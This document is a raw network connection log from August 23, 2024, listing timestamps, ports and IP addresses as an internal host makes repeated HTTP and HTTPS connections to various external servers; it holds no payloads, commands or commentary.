Aug 23, 2024 18:42:46.926892996 CEST	80	49741	13.248.169.48	192.168.2.5
Aug 23, 2024 18:42:46.926971912 CEST	49741	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:47.184885025 CEST	49741	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:47.189892054 CEST	80	49741	13.248.169.48	192.168.2.5
Aug 23, 2024 18:42:47.479645014 CEST	80	60684	3.64.163.50	192.168.2.5
Aug 23, 2024 18:42:47.479722023 CEST	60684	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:47.546861887 CEST	60684	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:47.551830053 CEST	80	60684	3.64.163.50	192.168.2.5
Aug 23, 2024 18:42:47.735388994 CEST	80	60684	3.64.163.50	192.168.2.5
Aug 23, 2024 18:42:47.735450983 CEST	60684	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:58.294745922 CEST	49737	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:00.288718939 CEST	49730	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:00.293541908 CEST	80	49730	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:00.680912018 CEST	80	49730	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:00.681001902 CEST	49730	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:01.208540916 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:01.208590984 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:01.208677053 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:01.253012896 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:01.253041029 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:01.727216005 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:01.727281094 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:01.799834967 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:01.799855947 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:01.800038099 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:01.800045013 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752044916 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752089024 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752123117 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752151012 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752192020 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752221107 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:05.752238989 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752252102 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752259970 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:05.752288103 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:05.752299070 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752830029 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.752876043 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:05.752885103 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.755484104 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:05.756901979 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.759165049 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:05.759172916 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.763158083 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:05.784073114 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:05.784167051 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:05.784178972 CEST	443	60696	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:05.784234047 CEST	60696	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:06.208023071 CEST	63517	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:43:06.217647076 CEST	80	63517	64.225.91.73	192.168.2.5
Aug 23, 2024 18:43:06.217735052 CEST	63517	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:43:06.217880011 CEST	63517	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:43:06.222739935 CEST	80	63517	64.225.91.73	192.168.2.5
Aug 23, 2024 18:43:06.441557884 CEST	63518	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:06.446552992 CEST	80	63518	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:06.446616888 CEST	63518	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:06.448183060 CEST	63518	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:06.453193903 CEST	80	63518	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:06.627696037 CEST	63519	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:43:06.638086081 CEST	80	63519	103.224.212.210	192.168.2.5
Aug 23, 2024 18:43:06.638144970 CEST	63519	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:43:06.638278008 CEST	63519	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:43:06.643306971 CEST	80	63519	103.224.212.210	192.168.2.5
Aug 23, 2024 18:43:06.698656082 CEST	63520	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:06.703725100 CEST	80	63520	15.197.240.20	192.168.2.5
Aug 23, 2024 18:43:06.703783035 CEST	63520	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:06.703964949 CEST	63520	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:06.708745003 CEST	80	63520	15.197.240.20	192.168.2.5
Aug 23, 2024 18:43:06.803102970 CEST	63521	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:43:06.808089972 CEST	80	63521	154.85.183.50	192.168.2.5
Aug 23, 2024 18:43:06.808156013 CEST	63521	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:43:06.808324099 CEST	63521	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:43:06.813160896 CEST	80	63521	154.85.183.50	192.168.2.5
Aug 23, 2024 18:43:06.834067106 CEST	80	63517	64.225.91.73	192.168.2.5
Aug 23, 2024 18:43:06.834132910 CEST	63517	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:43:06.844821930 CEST	63522	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:43:06.849586010 CEST	80	63522	103.224.182.252	192.168.2.5
Aug 23, 2024 18:43:06.849647999 CEST	63522	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:43:06.850079060 CEST	63522	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:43:06.855777025 CEST	80	63522	103.224.182.252	192.168.2.5
Aug 23, 2024 18:43:06.931480885 CEST	80	63518	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:06.931525946 CEST	63518	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:06.931560040 CEST	80	63518	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:06.931596041 CEST	63518	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:06.933362961 CEST	63518	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:06.938155890 CEST	80	63518	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:07.276716948 CEST	80	63519	103.224.212.210	192.168.2.5
Aug 23, 2024 18:43:07.276878119 CEST	63519	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:43:07.279280901 CEST	63519	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:43:07.280111074 CEST	80	63519	103.224.212.210	192.168.2.5
Aug 23, 2024 18:43:07.280293941 CEST	63519	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:43:07.284143925 CEST	80	63519	103.224.212.210	192.168.2.5
Aug 23, 2024 18:43:07.468786955 CEST	80	63522	103.224.182.252	192.168.2.5
Aug 23, 2024 18:43:07.468982935 CEST	80	63522	103.224.182.252	192.168.2.5
Aug 23, 2024 18:43:07.469104052 CEST	63522	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:43:07.472320080 CEST	63522	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:43:07.477102995 CEST	80	63522	103.224.182.252	192.168.2.5
Aug 23, 2024 18:43:07.617682934 CEST	63524	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:07.629784107 CEST	80	63524	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:07.629988909 CEST	63524	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:07.630143881 CEST	63524	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:07.636542082 CEST	80	63524	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:07.701025009 CEST	80	63521	154.85.183.50	192.168.2.5
Aug 23, 2024 18:43:07.701205969 CEST	63521	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:43:07.702388048 CEST	63521	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:43:07.708412886 CEST	80	63521	154.85.183.50	192.168.2.5
Aug 23, 2024 18:43:08.050574064 CEST	80	63521	154.85.183.50	192.168.2.5
Aug 23, 2024 18:43:08.051045895 CEST	63521	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:43:08.055150986 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.064671993 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.064893007 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.065329075 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.070280075 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.112518072 CEST	80	63524	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:08.112626076 CEST	80	63524	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:08.112662077 CEST	63524	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:08.112716913 CEST	80	63524	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:08.112746954 CEST	63524	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:08.112838030 CEST	63524	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:08.113724947 CEST	63524	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:08.113981009 CEST	63524	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:08.118477106 CEST	80	63524	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:08.118634939 CEST	63524	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:08.740223885 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740251064 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740272045 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740286112 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740286112 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.740295887 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740309954 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740319967 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.740319967 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.740322113 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740340948 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740350962 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740366936 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.740382910 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.740394115 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.740453005 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.745203972 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.745253086 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.745264053 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.745304108 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.837312937 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837358952 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837369919 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837373018 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.837402105 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.837424994 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.837429047 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837440968 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837454081 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837470055 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.837485075 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.837507010 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.837773085 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837812901 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.837850094 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837892056 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.837914944 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837925911 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.837955952 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:08.838327885 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:43:08.838382006 CEST	63525	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:43:14.726299047 CEST	80	49719	154.212.231.82	192.168.2.5
Aug 23, 2024 18:43:14.726363897 CEST	49719	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:43:17.170923948 CEST	80	63520	15.197.240.20	192.168.2.5
Aug 23, 2024 18:43:17.172159910 CEST	63520	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:17.236092091 CEST	63520	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:17.245266914 CEST	80	63520	15.197.240.20	192.168.2.5
Aug 23, 2024 18:43:17.252943993 CEST	63535	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:17.257931948 CEST	80	63535	15.197.240.20	192.168.2.5
Aug 23, 2024 18:43:17.258013010 CEST	63535	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:17.260711908 CEST	63535	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:17.265598059 CEST	80	63535	15.197.240.20	192.168.2.5
Aug 23, 2024 18:43:18.035476923 CEST	80	49709	3.64.163.50	192.168.2.5
Aug 23, 2024 18:43:18.035532951 CEST	49709	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:43:18.952770948 CEST	60684	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:43:27.748397112 CEST	80	63535	15.197.240.20	192.168.2.5
Aug 23, 2024 18:43:27.748480082 CEST	63535	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:27.748586893 CEST	63535	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:43:27.754621983 CEST	80	63535	15.197.240.20	192.168.2.5
Aug 23, 2024 18:43:28.077442884 CEST	62684	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:43:28.084798098 CEST	80	62684	64.225.91.73	192.168.2.5
Aug 23, 2024 18:43:28.084878922 CEST	62684	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:43:28.085216045 CEST	62684	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:43:28.092525959 CEST	80	62684	64.225.91.73	192.168.2.5
Aug 23, 2024 18:43:28.624198914 CEST	62685	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:28.629570961 CEST	80	62685	72.52.179.174	192.168.2.5
Aug 23, 2024 18:43:28.629653931 CEST	62685	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:28.629759073 CEST	62685	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:28.638276100 CEST	80	62685	72.52.179.174	192.168.2.5
Aug 23, 2024 18:43:28.678643942 CEST	80	62684	64.225.91.73	192.168.2.5
Aug 23, 2024 18:43:28.678792000 CEST	62684	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:43:29.163839102 CEST	80	62685	72.52.179.174	192.168.2.5
Aug 23, 2024 18:43:29.163916111 CEST	62685	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:29.164000988 CEST	62685	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:29.165291071 CEST	62686	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:29.168967962 CEST	80	62685	72.52.179.174	192.168.2.5
Aug 23, 2024 18:43:29.170448065 CEST	80	62686	72.52.179.174	192.168.2.5
Aug 23, 2024 18:43:29.170531034 CEST	62686	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:29.170671940 CEST	62686	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:29.176172018 CEST	80	62686	72.52.179.174	192.168.2.5
Aug 23, 2024 18:43:29.701442003 CEST	80	62686	72.52.179.174	192.168.2.5
Aug 23, 2024 18:43:29.703954935 CEST	62686	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:29.704020977 CEST	62686	80	192.168.2.5	72.52.179.174
Aug 23, 2024 18:43:29.708842993 CEST	80	62686	72.52.179.174	192.168.2.5
Aug 23, 2024 18:43:30.932274103 CEST	49369	80	192.168.2.5	52.34.198.229
Aug 23, 2024 18:43:30.937264919 CEST	80	49369	52.34.198.229	192.168.2.5
Aug 23, 2024 18:43:30.937334061 CEST	49369	80	192.168.2.5	52.34.198.229
Aug 23, 2024 18:43:30.937434912 CEST	49369	80	192.168.2.5	52.34.198.229
Aug 23, 2024 18:43:30.942646980 CEST	80	49369	52.34.198.229	192.168.2.5
Aug 23, 2024 18:43:31.676779985 CEST	80	49369	52.34.198.229	192.168.2.5
Aug 23, 2024 18:43:31.676841974 CEST	49369	80	192.168.2.5	52.34.198.229
Aug 23, 2024 18:43:31.677081108 CEST	80	49369	52.34.198.229	192.168.2.5
Aug 23, 2024 18:43:31.677164078 CEST	49369	80	192.168.2.5	52.34.198.229
Aug 23, 2024 18:43:31.678060055 CEST	49369	80	192.168.2.5	52.34.198.229
Aug 23, 2024 18:43:31.684676886 CEST	80	49369	52.34.198.229	192.168.2.5
Aug 23, 2024 18:43:33.027595043 CEST	60101	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:33.032702923 CEST	80	60101	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:33.032922029 CEST	60101	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:33.032958984 CEST	60101	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:33.037808895 CEST	80	60101	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:33.519668102 CEST	80	60101	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:33.519684076 CEST	80	60101	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:33.519751072 CEST	60101	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:33.521100044 CEST	60101	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:33.529016972 CEST	80	60101	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:34.360913992 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:34.361258030 CEST	59528	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:34.361486912 CEST	49709	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:43:34.361686945 CEST	59529	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:43:34.366276026 CEST	80	59528	162.255.119.102	192.168.2.5
Aug 23, 2024 18:43:34.366286993 CEST	80	49709	3.64.163.50	192.168.2.5
Aug 23, 2024 18:43:34.366378069 CEST	59528	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:34.366530895 CEST	80	59529	3.64.163.50	192.168.2.5
Aug 23, 2024 18:43:34.366604090 CEST	59528	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:34.366605043 CEST	59529	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:43:34.366822958 CEST	59529	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:43:34.370074987 CEST	49707	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:34.370290041 CEST	59530	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:34.372272015 CEST	80	59528	162.255.119.102	192.168.2.5
Aug 23, 2024 18:43:34.372281075 CEST	80	59529	3.64.163.50	192.168.2.5
Aug 23, 2024 18:43:34.375374079 CEST	80	59530	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:34.375494003 CEST	80	49707	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:34.376967907 CEST	49707	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:34.376982927 CEST	59530	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:34.377120972 CEST	59530	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:34.382349968 CEST	80	59530	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:34.472605944 CEST	59531	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:43:34.477590084 CEST	80	59531	172.234.222.143	192.168.2.5
Aug 23, 2024 18:43:34.477662086 CEST	59531	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:43:34.477802038 CEST	59531	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:43:34.482959032 CEST	80	59531	172.234.222.143	192.168.2.5
Aug 23, 2024 18:43:34.527806044 CEST	59532	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:34.528366089 CEST	59533	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:34.528662920 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:43:34.528971910 CEST	59534	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:43:34.532777071 CEST	80	59532	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:34.532866955 CEST	59532	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:34.533432961 CEST	80	59533	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:34.533535957 CEST	59533	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:34.534113884 CEST	80	59534	199.191.50.83	192.168.2.5
Aug 23, 2024 18:43:34.534125090 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:43:34.534209967 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:43:34.534219980 CEST	59534	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:43:34.547730923 CEST	59535	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:43:34.551023960 CEST	59536	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:34.551630974 CEST	59532	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:34.551754951 CEST	59533	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:34.551985025 CEST	59534	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:43:34.552958965 CEST	49715	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:43:34.553339958 CEST	59537	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:43:34.553567886 CEST	80	59535	3.94.10.34	192.168.2.5
Aug 23, 2024 18:43:34.553637028 CEST	59535	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:43:34.553793907 CEST	59535	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:43:34.556184053 CEST	80	59536	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:34.556263924 CEST	59536	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:34.556453943 CEST	59536	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:34.556778908 CEST	80	59532	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:34.556788921 CEST	80	59533	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:34.557686090 CEST	80	59534	199.191.50.83	192.168.2.5
Aug 23, 2024 18:43:34.559334993 CEST	80	49715	208.100.26.245	192.168.2.5
Aug 23, 2024 18:43:34.559353113 CEST	80	59537	208.100.26.245	192.168.2.5
Aug 23, 2024 18:43:34.559361935 CEST	80	59535	3.94.10.34	192.168.2.5
Aug 23, 2024 18:43:34.559386969 CEST	49715	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:43:34.559427977 CEST	59537	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:43:34.559590101 CEST	59537	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:43:34.563617945 CEST	80	59536	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:34.565427065 CEST	59538	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:43:34.571157932 CEST	80	59537	208.100.26.245	192.168.2.5
Aug 23, 2024 18:43:34.576750040 CEST	80	59538	69.162.80.57	192.168.2.5
Aug 23, 2024 18:43:34.576812983 CEST	59538	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:43:34.577023029 CEST	59538	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:43:34.582765102 CEST	80	59538	69.162.80.57	192.168.2.5
Aug 23, 2024 18:43:34.671813011 CEST	80	49733	103.150.11.230	192.168.2.5
Aug 23, 2024 18:43:34.671879053 CEST	49733	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:43:34.673073053 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:35.007133007 CEST	80	59529	3.64.163.50	192.168.2.5
Aug 23, 2024 18:43:35.007208109 CEST	59529	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:43:35.008361101 CEST	59529	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:43:35.014705896 CEST	80	59529	3.64.163.50	192.168.2.5
Aug 23, 2024 18:43:35.027647972 CEST	80	59532	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:35.027704954 CEST	59532	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:35.027920008 CEST	80	59535	3.94.10.34	192.168.2.5
Aug 23, 2024 18:43:35.027987957 CEST	59535	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:43:35.028034925 CEST	80	59532	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:35.028080940 CEST	59532	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:35.028810978 CEST	59532	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:35.028907061 CEST	59535	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:43:35.029165030 CEST	80	59535	3.94.10.34	192.168.2.5
Aug 23, 2024 18:43:35.029217005 CEST	59535	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:43:35.030492067 CEST	80	59533	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:35.030591965 CEST	59533	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:35.030673981 CEST	80	59533	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:35.030741930 CEST	59533	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:35.031291008 CEST	59533	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:35.033590078 CEST	80	59532	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:35.034023046 CEST	80	59535	3.94.10.34	192.168.2.5
Aug 23, 2024 18:43:35.036043882 CEST	80	59533	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:35.057529926 CEST	80	59536	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:35.057590961 CEST	59536	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:35.057818890 CEST	80	59536	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:35.058195114 CEST	59536	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:35.058237076 CEST	59536	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:43:35.062794924 CEST	80	59537	208.100.26.245	192.168.2.5
Aug 23, 2024 18:43:35.062845945 CEST	59537	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:43:35.063307047 CEST	80	59536	44.221.84.105	192.168.2.5
Aug 23, 2024 18:43:35.063641071 CEST	59537	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:43:35.068600893 CEST	80	59537	208.100.26.245	192.168.2.5
Aug 23, 2024 18:43:35.089855909 CEST	80	59530	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:35.089911938 CEST	59530	80	192.168.2.5	188.114.96.3
